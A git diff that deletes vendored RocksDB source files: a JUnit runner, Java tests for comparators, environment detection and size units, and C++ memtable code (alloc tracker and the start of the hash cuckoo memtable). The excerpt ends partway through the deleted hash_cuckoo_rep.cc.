@@ -1,70 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.test;
-
-import org.junit.internal.JUnitSystem;
-import org.junit.internal.RealSystem;
-import org.junit.internal.TextListener;
-import org.junit.runner.Description;
-import org.junit.runner.JUnitCore;
-import org.junit.runner.Result;
-
-import java.util.ArrayList;
-import java.util.List;
-
-/**
- * Custom Junit Runner to print also Test classes
- * and executed methods to command prompt.
- */
-public class RocksJunitRunner {
-
-  /**
-   * Listener which overrides default functionality
-   * to print class and method to system out.
-   */
-  static class RocksJunitListener extends TextListener {
-
-    /**
-     * RocksJunitListener constructor
-     *
-     * @param system JUnitSystem
-     */
-    public RocksJunitListener(final JUnitSystem system) {
-      super(system);
-    }
-
-    @Override
-    public void testStarted(final Description description) {
-       System.out.format("Run: %s testing now -> %s \n",
-           description.getClassName(),
-           description.getMethodName());
-    }
-  }
-
-  /**
-   * Main method to execute tests
-   *
-   * @param args Test classes as String names
-   */
-  public static void main(final String[] args){
-    final JUnitCore runner = new JUnitCore();
-    final JUnitSystem system = new RealSystem();
-    runner.addListener(new RocksJunitListener(system));
-    try {
-      final List<Class<?>> classes = new ArrayList<>();
-      for (final String arg : args) {
-        classes.add(Class.forName(arg));
-      }
-      final Class[] clazzes = classes.toArray(new Class[classes.size()]);
-      final Result result = runner.run(clazzes);
-      if(!result.wasSuccessful()) {
-        System.exit(-1);
-      }
-    } catch (final ClassNotFoundException e) {
-      e.printStackTrace();
-      System.exit(-2);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
deleted file mode 100644
index 42508bc..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/BytewiseComparatorTest.java
+++ /dev/null
@@ -1,480 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.junit.Test;
-import org.rocksdb.*;
-import org.rocksdb.Comparator;
-
-import java.io.IOException;
-import java.nio.charset.StandardCharsets;
-import java.nio.file.FileVisitResult;
-import java.nio.file.Files;
-import java.nio.file.Path;
-import java.nio.file.SimpleFileVisitor;
-import java.nio.file.attribute.BasicFileAttributes;
-import java.util.*;
-
-import static org.junit.Assert.*;
-
-/**
- * This is a direct port of various C++
- * tests from db/comparator_db_test.cc
- * and some code to adapt it to RocksJava
- */
-public class BytewiseComparatorTest {
-
-  /**
-   * Open the database using the C++ BytewiseComparatorImpl
-   * and test the results against our Java BytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_bytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new BytewiseComparator(new ComparatorOptions())),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java BytewiseComparator
-   * and test the results against another Java BytewiseComparator
-   */
-  @Test
-  public void java_vs_java_bytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new BytewiseComparator(
-          new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new BytewiseComparator(new ComparatorOptions())),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the C++ BytewiseComparatorImpl
-   * and test the results against our Java DirectBytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_directBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new DirectBytewiseComparator(
-                new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java DirectBytewiseComparator
-   * and test the results against another Java DirectBytewiseComparator
-   */
-  @Test
-  public void java_vs_java_directBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new DirectBytewiseComparator(
-            new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(new DirectBytewiseComparator(
-                new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the C++ ReverseBytewiseComparatorImpl
-   * and test the results against our Java ReverseBytewiseComparator
-   */
-  @Test
-  public void java_vs_cpp_reverseBytewiseComparator()
-      throws IOException, RocksDBException {
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir,
-          BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR)) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(
-                new ReverseBytewiseComparator(new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  /**
-   * Open the database using the Java ReverseBytewiseComparator
-   * and test the results against another Java ReverseBytewiseComparator
-   */
-  @Test
-  public void java_vs_java_reverseBytewiseComparator()
-      throws IOException, RocksDBException {
-
-    for(int rand_seed = 301; rand_seed < 306; rand_seed++) {
-      final Path dbDir = Files.createTempDirectory("comparator_db_test");
-      try(final RocksDB db = openDatabase(dbDir, new ReverseBytewiseComparator(
-            new ComparatorOptions()))) {
-        final Random rnd = new Random(rand_seed);
-        doRandomIterationTest(
-            db,
-            toJavaComparator(
-                new ReverseBytewiseComparator(new ComparatorOptions())
-            ),
-            Arrays.asList("a", "b", "c", "d", "e", "f", "g", "h", "i"),
-            rnd,
-            8, 100, 3
-        );
-      } finally {
-        removeData(dbDir);
-      }
-    }
-  }
-
-  private void doRandomIterationTest(
-      final RocksDB db, final java.util.Comparator<String> javaComparator,
-      final List<String> source_strings, final Random rnd,
-      final int num_writes, final int num_iter_ops,
-      final int num_trigger_flush) throws RocksDBException {
-
-    final TreeMap<String, String> map = new TreeMap<>(javaComparator);
-
-    for (int i = 0; i < num_writes; i++) {
-      if (num_trigger_flush > 0 && i != 0 && i % num_trigger_flush == 0) {
-        db.flush(new FlushOptions());
-      }
-
-      final int type = rnd.nextInt(2);
-      final int index = rnd.nextInt(source_strings.size());
-      final String key = source_strings.get(index);
-      switch (type) {
-        case 0:
-          // put
-          map.put(key, key);
-          db.put(new WriteOptions(), bytes(key), bytes(key));
-          break;
-        case 1:
-          // delete
-          if (map.containsKey(key)) {
-            map.remove(key);
-          }
-          db.remove(new WriteOptions(), bytes(key));
-          break;
-
-        default:
-          fail("Should not be able to generate random outside range 1..2");
-      }
-    }
-
-    try(final RocksIterator iter = db.newIterator(new ReadOptions())) {
-      final KVIter<String, String> result_iter = new KVIter(map);
-
-      boolean is_valid = false;
-      for (int i = 0; i < num_iter_ops; i++) {
-        // Random walk and make sure iter and result_iter returns the
-        // same key and value
-        final int type = rnd.nextInt(6);
-        iter.status();
-        switch (type) {
-          case 0:
-            // Seek to First
-            iter.seekToFirst();
-            result_iter.seekToFirst();
-            break;
-          case 1:
-            // Seek to last
-            iter.seekToLast();
-            result_iter.seekToLast();
-            break;
-          case 2: {
-            // Seek to random key
-            final int key_idx = rnd.nextInt(source_strings.size());
-            final String key = source_strings.get(key_idx);
-            iter.seek(bytes(key));
-            result_iter.seek(bytes(key));
-            break;
-          }
-          case 3:
-            // Next
-            if (is_valid) {
-              iter.next();
-              result_iter.next();
-            } else {
-              continue;
-            }
-            break;
-          case 4:
-            // Prev
-            if (is_valid) {
-              iter.prev();
-              result_iter.prev();
-            } else {
-              continue;
-            }
-            break;
-          default: {
-            assert (type == 5);
-            final int key_idx = rnd.nextInt(source_strings.size());
-            final String key = source_strings.get(key_idx);
-            final byte[] result = db.get(new ReadOptions(), bytes(key));
-            if (!map.containsKey(key)) {
-              assertNull(result);
-            } else {
-              assertArrayEquals(bytes(map.get(key)), result);
-            }
-            break;
-          }
-        }
-
-        assertEquals(result_iter.isValid(), iter.isValid());
-
-        is_valid = iter.isValid();
-
-        if (is_valid) {
-          assertArrayEquals(bytes(result_iter.key()), iter.key());
-
-          //note that calling value on a non-valid iterator from the Java API
-          //results in a SIGSEGV
-          assertArrayEquals(bytes(result_iter.value()), iter.value());
-        }
-      }
-    }
-  }
-
-  /**
-   * Open the database using a C++ Comparator
-   */
-  private RocksDB openDatabase(
-      final Path dbDir, final BuiltinComparator cppComparator)
-      throws IOException, RocksDBException {
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setComparator(cppComparator);
-    return RocksDB.open(options, dbDir.toAbsolutePath().toString());
-  }
-
-  /**
-   * Open the database using a Java Comparator
-   */
-  private RocksDB openDatabase(
-      final Path dbDir,
-      final AbstractComparator<? extends AbstractSlice<?>> javaComparator)
-      throws IOException, RocksDBException {
-    final Options options = new Options()
-        .setCreateIfMissing(true)
-        .setComparator(javaComparator);
-    return RocksDB.open(options, dbDir.toAbsolutePath().toString());
-  }
-
-  private void closeDatabase(final RocksDB db) {
-    db.close();
-  }
-
-  private void removeData(final Path dbDir) throws IOException {
-    Files.walkFileTree(dbDir, new SimpleFileVisitor<Path>() {
-      @Override
-      public FileVisitResult visitFile(
-          final Path file, final BasicFileAttributes attrs)
-          throws IOException {
-        Files.delete(file);
-        return FileVisitResult.CONTINUE;
-      }
-
-      @Override
-      public FileVisitResult postVisitDirectory(
-          final Path dir, final IOException exc) throws IOException {
-        Files.delete(dir);
-        return FileVisitResult.CONTINUE;
-      }
-    });
-  }
-
-  private byte[] bytes(final String s) {
-    return s.getBytes(StandardCharsets.UTF_8);
-  }
-
-  private java.util.Comparator<String> toJavaComparator(
-      final Comparator rocksComparator) {
-    return new java.util.Comparator<String>() {
-      @Override
-      public int compare(final String s1, final String s2) {
-        return rocksComparator.compare(new Slice(s1), new Slice(s2));
-      }
-    };
-  }
-
-  private java.util.Comparator<String> toJavaComparator(
-      final DirectComparator rocksComparator) {
-    return new java.util.Comparator<String>() {
-      @Override
-      public int compare(final String s1, final String s2) {
-        return rocksComparator.compare(new DirectSlice(s1),
-            new DirectSlice(s2));
-      }
-    };
-  }
-
-  private class KVIter<K, V> implements RocksIteratorInterface {
-
-    private final List<Map.Entry<K, V>> entries;
-    private final java.util.Comparator<? super K> comparator;
-    private int offset = -1;
-
-    private int lastPrefixMatchIdx = -1;
-    private int lastPrefixMatch = 0;
-
-    public KVIter(final TreeMap<K, V> map) {
-      this.entries = new ArrayList<>();
-      final Iterator<Map.Entry<K, V>> iterator = map.entrySet().iterator();
-      while(iterator.hasNext()) {
-        entries.add(iterator.next());
-      }
-      this.comparator = map.comparator();
-    }
-
-
-    @Override
-    public boolean isValid() {
-      return offset > -1 && offset < entries.size();
-    }
-
-    @Override
-    public void seekToFirst() {
-      offset = 0;
-    }
-
-    @Override
-    public void seekToLast() {
-      offset = entries.size() - 1;
-    }
-
-    @Override
-    public void seek(final byte[] target) {
-      for(offset = 0; offset < entries.size(); offset++) {
-        if(comparator.compare(entries.get(offset).getKey(),
-            (K)new String(target, StandardCharsets.UTF_8)) >= 0) {
-          return;
-        }
-      }
-    }
-
-    /**
-     * Is `a` a prefix of `b`
-     *
-     * @return The length of the matching prefix, or 0 if it is not a prefix
-     */
-    private int isPrefix(final byte[] a, final byte[] b) {
-      if(b.length >= a.length) {
-        for(int i = 0; i < a.length; i++) {
-          if(a[i] != b[i]) {
-            return i;
-          }
-        }
-        return a.length;
-      } else {
-        return 0;
-      }
-    }
-
-    @Override
-    public void next() {
-      if(offset < entries.size()) {
-        offset++;
-      }
-    }
-
-    @Override
-    public void prev() {
-      if(offset >= 0) {
-        offset--;
-      }
-    }
-
-    @Override
-    public void status() throws RocksDBException {
-      if(offset < 0 || offset >= entries.size()) {
-        throw new RocksDBException("Index out of bounds. Size is: " +
-            entries.size() + ", offset is: " + offset);
-      }
-    }
-
-    public K key() {
-      if(!isValid()) {
-        if(entries.isEmpty()) {
-          return (K)"";
-        } else if(offset == -1){
-          return entries.get(0).getKey();
-        } else if(offset == entries.size()) {
-          return entries.get(offset - 1).getKey();
-        } else {
-          return (K)"";
-        }
-      } else {
-        return entries.get(offset).getKey();
-      }
-    }
-
-    public V value() {
-      if(!isValid()) {
-        return (V)"";
-      } else {
-        return entries.get(offset).getValue();
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
deleted file mode 100644
index 28ee047..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/EnvironmentTest.java
+++ /dev/null
@@ -1,172 +0,0 @@
-// Copyright (c) 2014, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.util;
-
-import org.junit.AfterClass;
-import org.junit.BeforeClass;
-import org.junit.Test;
-
-import java.lang.reflect.Field;
-import java.lang.reflect.Modifier;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class EnvironmentTest {
-  private final static String ARCH_FIELD_NAME = "ARCH";
-  private final static String OS_FIELD_NAME = "OS";
-
-  private static String INITIAL_OS;
-  private static String INITIAL_ARCH;
-
-  @BeforeClass
-  public static void saveState() {
-    INITIAL_ARCH = getEnvironmentClassField(ARCH_FIELD_NAME);
-    INITIAL_OS = getEnvironmentClassField(OS_FIELD_NAME);
-  }
-
-  @Test
-  public void mac32() {
-    setEnvironmentClassFields("mac", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".jnilib");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-osx.jnilib");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.dylib");
-  }
-
-  @Test
-  public void mac64() {
-    setEnvironmentClassFields("mac", "64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".jnilib");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-osx.jnilib");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.dylib");
-  }
-
-  @Test
-  public void nix32() {
-    // Linux
-    setEnvironmentClassFields("Linux", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux32.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // UNIX
-    setEnvironmentClassFields("Unix", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux32.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-  }
-
-  @Test(expected = UnsupportedOperationException.class)
-  public void aix32() {
-    // AIX
-    setEnvironmentClassFields("aix", "32");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    Environment.getJniLibraryFileName("rocksdb");
-  }
-
-  @Test
-  public void nix64() {
-    setEnvironmentClassFields("Linux", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // UNIX
-    setEnvironmentClassFields("Unix", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-linux64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-    // AIX
-    setEnvironmentClassFields("aix", "x64");
-    assertThat(Environment.isWindows()).isFalse();
-    assertThat(Environment.getJniLibraryExtension()).
-        isEqualTo(".so");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni-aix64.so");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-        isEqualTo("librocksdbjni.so");
-  }
-
-  @Test
-  public void detectWindows(){
-    setEnvironmentClassFields("win", "x64");
-    assertThat(Environment.isWindows()).isTrue();
-  }
-
-  @Test
-  public void win64() {
-    setEnvironmentClassFields("win", "x64");
-    assertThat(Environment.isWindows()).isTrue();
-    assertThat(Environment.getJniLibraryExtension()).
-      isEqualTo(".dll");
-    assertThat(Environment.getJniLibraryFileName("rocksdb")).
-      isEqualTo("librocksdbjni-win64.dll");
-    assertThat(Environment.getSharedLibraryFileName("rocksdb")).
-      isEqualTo("librocksdbjni.dll");
-  }
-
-  private void setEnvironmentClassFields(String osName,
-      String osArch) {
-    setEnvironmentClassField(OS_FIELD_NAME, osName);
-    setEnvironmentClassField(ARCH_FIELD_NAME, osArch);
-  }
-
-  @AfterClass
-  public static void restoreState() {
-    setEnvironmentClassField(OS_FIELD_NAME, INITIAL_OS);
-    setEnvironmentClassField(ARCH_FIELD_NAME, INITIAL_ARCH);
-  }
-
-  private static String getEnvironmentClassField(String fieldName) {
-    final Field field;
-    try {
-      field = Environment.class.getDeclaredField(fieldName);
-      field.setAccessible(true);
-      final Field modifiersField = Field.class.getDeclaredField("modifiers");
-      modifiersField.setAccessible(true);
-      modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
-      return (String)field.get(null);
-    } catch (NoSuchFieldException | IllegalAccessException e) {
-      throw new RuntimeException(e);
-    }
-  }
-
-  private static void setEnvironmentClassField(String fieldName, String value) {
-    final Field field;
-    try {
-      field = Environment.class.getDeclaredField(fieldName);
-      field.setAccessible(true);
-      final Field modifiersField = Field.class.getDeclaredField("modifiers");
-      modifiersField.setAccessible(true);
-      modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
-      field.set(null, value);
-    } catch (NoSuchFieldException | IllegalAccessException e) {
-      throw new RuntimeException(e);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
deleted file mode 100644
index 990aa5f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/util/SizeUnitTest.java
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb.util;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class SizeUnitTest {
-
-  public static final long COMPUTATION_UNIT = 1024L;
-
-  @Test
-  public void sizeUnit() {
-    assertThat(SizeUnit.KB).isEqualTo(COMPUTATION_UNIT);
-    assertThat(SizeUnit.MB).isEqualTo(
-        SizeUnit.KB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.GB).isEqualTo(
-        SizeUnit.MB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.TB).isEqualTo(
-        SizeUnit.GB * COMPUTATION_UNIT);
-    assertThat(SizeUnit.PB).isEqualTo(
-        SizeUnit.TB * COMPUTATION_UNIT);
-  }
-}
diff --git a/thirdparty/rocksdb/memtable/alloc_tracker.cc b/thirdparty/rocksdb/memtable/alloc_tracker.cc
deleted file mode 100644
index 9889cc4..0000000
--- a/thirdparty/rocksdb/memtable/alloc_tracker.cc
+++ /dev/null
@@ -1,59 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <assert.h>
-#include "rocksdb/write_buffer_manager.h"
-#include "util/allocator.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-AllocTracker::AllocTracker(WriteBufferManager* write_buffer_manager)
-    : write_buffer_manager_(write_buffer_manager),
-      bytes_allocated_(0),
-      done_allocating_(false),
-      freed_(false) {}
-
-AllocTracker::~AllocTracker() { FreeMem(); }
-
-void AllocTracker::Allocate(size_t bytes) {
-  assert(write_buffer_manager_ != nullptr);
-  if (write_buffer_manager_->enabled()) {
-    bytes_allocated_.fetch_add(bytes, std::memory_order_relaxed);
-    write_buffer_manager_->ReserveMem(bytes);
-  }
-}
-
-void AllocTracker::DoneAllocating() {
-  if (write_buffer_manager_ != nullptr && !done_allocating_) {
-    if (write_buffer_manager_->enabled()) {
-      write_buffer_manager_->ScheduleFreeMem(
-          bytes_allocated_.load(std::memory_order_relaxed));
-    } else {
-      assert(bytes_allocated_.load(std::memory_order_relaxed) == 0);
-    }
-    done_allocating_ = true;
-  }
-}
-
-void AllocTracker::FreeMem() {
-  if (!done_allocating_) {
-    DoneAllocating();
-  }
-  if (write_buffer_manager_ != nullptr && !freed_) {
-    if (write_buffer_manager_->enabled()) {
-      write_buffer_manager_->FreeMem(
-          bytes_allocated_.load(std::memory_order_relaxed));
-    } else {
-      assert(bytes_allocated_.load(std::memory_order_relaxed) == 0);
-    }
-    freed_ = true;
-  }
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc b/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc
deleted file mode 100644
index 034bf58..0000000
--- a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.cc
+++ /dev/null
@@ -1,660 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_cuckoo_rep.h"
-
-#include <algorithm>
-#include <atomic>
-#include <limits>
-#include <memory>
-#include <queue>
-#include <string>
-#include <vector>
-
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-#include "memtable/stl_wrappers.h"
-#include "port/port.h"
-#include "rocksdb/memtablerep.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace {
-
-// the default maximum size of the cuckoo path searching queue
-static const int kCuckooPathMaxSearchSteps = 100;
-
-struct CuckooStep {
-  static const int kNullStep = -1;
-  // the bucket id in the cuckoo array.
-  int bucket_id_;
-  // index of cuckoo-step array that points to its previous step,
-  // -1 if it the beginning step.
-  int prev_step_id_;
-  // the depth of the current step.
-  unsigned int depth_;
-
-  CuckooStep() : bucket_id_(-1), prev_step_id_(kNullStep), depth_(1) {}
-
-  CuckooStep(CuckooStep&& o) = default;
-
-  CuckooStep& operator=(CuckooStep&& rhs) {
-    bucket_id_ = std::move(rhs.bucket_id_);
-    prev_step_id_ = std::move(rhs.prev_step_id_);
-    depth_ = std::move(rhs.depth_);
-    return *this;
-  }
-
-  CuckooStep(const CuckooStep&) = delete;
-  CuckooStep& operator=(const CuckooStep&) = delete;
-
-  CuckooStep(int bucket_id, int prev_step_id, int depth)
-      : bucket_id_(bucket_id), prev_step_id_(prev_step_id), depth_(depth) {}
-};
-
-class HashCuckooRep : public MemTableRep {
- public:
-  explicit HashCuckooRep(const MemTableRep::KeyComparator& compare,
-                         Allocator* allocator, const size_t bucket_count,
-                         const unsigned int hash_func_count,
-                         const size_t approximate_entry_size)
-      : MemTableRep(allocator),
-        compare_(compare),
-        allocator_(allocator),
-        bucket_count_(bucket_count),
-        approximate_entry_size_(approximate_entry_size),
-        cuckoo_path_max_depth_(kDefaultCuckooPathMaxDepth),
-        occupied_count_(0),
-        hash_function_count_(hash_func_count),
-        backup_table_(nullptr) {
-    char* mem = reinterpret_cast<char*>(
-        allocator_->Allocate(sizeof(std::atomic<const char*>) * bucket_count_));
-    cuckoo_array_ = new (mem) std::atomic<char*>[bucket_count_];
-    for (unsigned int bid = 0; bid < bucket_count_; ++bid) {
-      cuckoo_array_[bid].store(nullptr, std::memory_order_relaxed);
-    }
-
-    cuckoo_path_ = reinterpret_cast<int*>(
-        allocator_->Allocate(sizeof(int) * (cuckoo_path_max_depth_ + 1)));
-    is_nearly_full_ = false;
-  }
-
-  // return false, indicating HashCuckooRep does not support merge operator.
-  virtual bool IsMergeOperatorSupported() const override { return false; }
-
-  // return false, indicating HashCuckooRep does not support snapshot.
-  virtual bool IsSnapshotSupported() const override { return false; }
-
-  // Returns true iff an entry that compares equal to key is in the collection.
-  virtual bool Contains(const char* internal_key) const override;
-
-  virtual ~HashCuckooRep() override {}
-
-  // Insert the specified key (internal_key) into the mem-table.  Assertion
-  // fails if
-  // the current mem-table already contains the specified key.
-  virtual void Insert(KeyHandle handle) override;
-
-  // This function returns bucket_count_ * approximate_entry_size_ when any
-  // of the followings happen to disallow further write operations:
-  // 1. when the fullness reaches kMaxFullnes.
-  // 2. when the backup_table_ is used.
-  //
-  // otherwise, this function will always return 0.
-  virtual size_t ApproximateMemoryUsage() override {
-    if (is_nearly_full_) {
-      return bucket_count_ * approximate_entry_size_;
-    }
-    return 0;
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  class Iterator : public MemTableRep::Iterator {
-    std::shared_ptr<std::vector<const char*>> bucket_;
-    std::vector<const char*>::const_iterator mutable cit_;
-    const KeyComparator& compare_;
-    std::string tmp_;  // For passing to EncodeKey
-    bool mutable sorted_;
-    void DoSort() const;
-
-   public:
-    explicit Iterator(std::shared_ptr<std::vector<const char*>> bucket,
-                      const KeyComparator& compare);
-
-    // Initialize an iterator over the specified collection.
-    // The returned iterator is not valid.
-    // explicit Iterator(const MemTableRep* collection);
-    virtual ~Iterator() override{};
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override;
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override;
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& user_key, const char* memtable_key) override;
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& user_key,
-                             const char* memtable_key) override;
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override;
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override;
-  };
-
-  struct CuckooStepBuffer {
-    CuckooStepBuffer() : write_index_(0), read_index_(0) {}
-    ~CuckooStepBuffer() {}
-
-    int write_index_;
-    int read_index_;
-    CuckooStep steps_[kCuckooPathMaxSearchSteps];
-
-    CuckooStep& NextWriteBuffer() { return steps_[write_index_++]; }
-
-    inline const CuckooStep& ReadNext() { return steps_[read_index_++]; }
-
-    inline bool HasNewWrite() { return write_index_ > read_index_; }
-
-    inline void reset() {
-      write_index_ = 0;
-      read_index_ = 0;
-    }
-
-    inline bool IsFull() { return write_index_ >= kCuckooPathMaxSearchSteps; }
-
-    // returns the number of steps that has been read
-    inline int ReadCount() { return read_index_; }
-
-    // returns the number of steps that has been written to the buffer.
-    inline int WriteCount() { return write_index_; }
-  };
-
- private:
-  const MemTableRep::KeyComparator& compare_;
-  // the pointer to Allocator to allocate memory, immutable after construction.
